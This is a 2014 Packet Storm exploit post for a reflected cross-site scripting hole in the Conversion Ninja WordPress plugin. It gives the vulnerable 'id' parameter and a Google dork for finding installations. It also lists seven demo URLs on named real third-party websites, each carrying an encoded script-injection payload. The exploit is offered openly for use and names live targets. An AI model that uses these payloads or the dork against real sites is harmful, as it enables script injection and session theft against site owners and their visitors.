WordPress Conversion Ninja Cross Site Scripting

2014-05-22T00:00:00
ID PACKETSTORM:126781
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2014-05-22T00:00:00

Description

                                        
                                            `[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
[+]  
[+] Exploit Title: Wordpress Plugin Conversionninja Cross Site Scripting  
[+]  
[+] Exploit Author: Ashiyane Digital Security Team  
[+]  
[+] Date: 2014-05-22  
[+]  
[+] Google Dork : inurl:wp-content/plugins/conversionninja  
[+]  
[+] Vendor Homepage : http://www.Wordpress.org  
[+]  
[+] Tested on: Windows 7 , Mozilla FireFox  
[+]  
[+] Discovered By : Milad Hacking  
[+]  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
  
[+] Location :  
[localhost]/wp-content/plugins/conversionninja/lp/index.php?id=[XSS]  
  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
  
[+] Demo :  
  
http://mlm18.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://www.digitaler-kabelanschluss.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://www.schwarzer-adler-feucht.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://bestvertrieb.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://gratis-webinare.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://www.salsa-online-academy.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
http://dasleadsystem.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E  
  
  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
  
[+] Discovered By : Milad Hacking  
  
We Love Mohammad  
  
Mail : milad.hacking.blackhat@gmail.com  
  
Home Page : https://www.facebook.com/milad.hacking.5  
  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
`